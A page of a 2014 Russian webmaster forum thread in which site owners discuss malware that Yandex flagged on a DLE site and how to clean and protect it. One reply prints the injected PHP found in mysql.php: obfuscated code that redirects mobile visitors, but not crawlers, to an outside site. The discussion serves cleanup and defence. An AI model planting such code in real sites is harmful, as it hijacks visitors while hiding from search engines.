X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

3 страниц V  < 1 2 3 >
Открыть тему
Тема закрыта
> Срочно нужна помощь! Вредоносный код!, Яндекс что-то нашел на сайте, не знаю как удалить :(
koroluk1990
koroluk1990
Topic Starter сообщение 7.7.2014, 19:56; Ответить: koroluk1990
Сообщение #12


n0rv, спросите у AtaELL, он почистил, что-то нашел :)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
AtaELL
AtaELL
сообщение 7.7.2014, 20:01; Ответить: AtaELL
Сообщение #13


n0rv, проверка была неполная, но вот что нашлось

/engine/classes/mysql.php - в этом файле нашелся код
Код
$gant = strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth'))]);$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))];
if(!preg_match('/crawl|andex|oogle|bot/i',$gant)) {
if((preg_match('/ndroi|htc_|htc-/i',$gant)) and (!isset ($_COOKIE['dle_user_id'])) and($_SERVER['REQUEST_URI'] != '/'))
{header(strrev('=REREFER_PTTH&1=ru&lmth.11'.'/67namyrros/'.'stneilc'.'/cc.'.'slm'.'thx'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}}


/engine/modules/functions.php - и здесь (возможно это и не лишнее, но раньше в дле не встречал, без него сайт работает норм)
Код
if( ip2long($_SERVER['HTTP_HOST']) != -1 AND ip2long($_SERVER['HTTP_HOST']) !== FALSE ) define( 'DOMAIN', null );
else define( 'DOMAIN', $domain_cookie );

$set_cookie = strrev('tressa');


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
n0rv
n0rv
сообщение 7.7.2014, 21:10; Ответить: n0rv
Сообщение #14


AtaELL, спасибо.
Идентичный код встречал так же не Вордпрес сайтах.
Не знаете как защититься от это напасти?


--------------------
Комплексная оптимизация и продвижение сайтов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
AtaELL
AtaELL
сообщение 7.7.2014, 21:23; Ответить: AtaELL
Сообщение #15


n0rv, нужно закрывать дыры в сайтах, но сделать это сейчас практически невозможно, так как постоянно ставятся разные модули, дополнения, которые уже могут быть заражены либо нести потенциальную опасность, да и корявые руки админов вашего хостинга может быть причинной заражения

вероятность заражения можно уменьшить, если использовать движки, модули с проверенных источников, выставлять права доступа на файлы, размещаться у нормальных хостеров
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Mukis
Mukis
сообщение 8.7.2014, 0:05; Ответить: Mukis
Сообщение #16


koroluk1990, Если понадобится спец в этом деле - стукните мне 173973, подскажу. Занимается тем, что чистит сайты от зараз различных. Давно с ним знаком, отличный парень.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kolor73
kolor73
сообщение 8.7.2014, 8:59; Ответить: kolor73
Сообщение #17


koroluk1990,
у меня была такая проблема я удалил виджет одна кнопка и все стало работать нормально. У меня такая проблема шаблон вордпресс делает свои кейвордс и дискрипшин плюс в плагине сео пак я их делаю. Получается дублирование это влияет на реливатность страниц, как это исправить никто не знает?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Telnor
Telnor
сообщение 8.7.2014, 14:11; Ответить: Telnor
Сообщение #18


Цитата(AtaELL @ 7.7.2014, 19:01) *
проверка была неполная, но вот что нашлось

Вы удалили его. Но не вернется ли оно снова?


--------------------
Продаются сайты с доходом, недорого
Сдам место в подписи, или обменяю на хостинг
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
AtaELL
AtaELL
сообщение 8.7.2014, 14:23; Ответить: AtaELL
Сообщение #19


Telnor,
Увы, не исключено. Поиск и устранение уязвимости это не 20-минутная задача, здесь нужно более масштабную работу по сайту проводить.

Сообщение отредактировал AtaELL - 8.7.2014, 14:23
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
koroluk1990
koroluk1990
Topic Starter сообщение 8.7.2014, 23:40; Ответить: koroluk1990
Сообщение #20


Здравствуйте, Александр!

В настоящий момент с Вашим сайтом все в порядке, он успешно прошёл перепроверку. Пометка в результатах поиска должна автоматически исчезнуть в течение нескольких часов.

Ранее при проверке Вашего сайта наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на другие ресурсы при посещении сайта с мобильных устройств.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Demcheg
Demcheg
сообщение 24.7.2014, 12:50; Ответить: Demcheg
Сообщение #21


koroluk1990, отдельно скажу о версии DLE. Самого подобным образом взламывали - решил восстановлением из не зараженного бекапа, а затем обновлением DLE до последней версии.
Если не ошибаюсь, взламывали меня на версии DLE 10.0.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V  < 1 2 3 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Нужна програмка постинга в свои сайты
0 kasey7 227 Вчера, 19:54
автор: kasey7
Открытая тема (нет новых ответов) Требуется помощь по сайту на "ВордПресс"
Закрылся доступ в панель администратора
15 Tia2 2364 17.4.2024, 0:54
автор: diviner99
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыСостояние после ампутации - нужна помощь
благотворительный топик
49 vitvirtual 5893 1.4.2024, 5:23
автор: vitvirtual
Открытая тема (нет новых ответов) Нужна ли плоская структура категорий в ИМ?
1 noviktamw 1180 26.3.2024, 21:50
автор: c4p1t4l15t
Открытая тема (нет новых ответов) требуется помощь с themasoftware (Темапостером)
0 Taylor 627 16.3.2024, 18:41
автор: Taylor


 



RSS Текстовая версия Сейчас: 23.4.2024, 13:44
Дизайн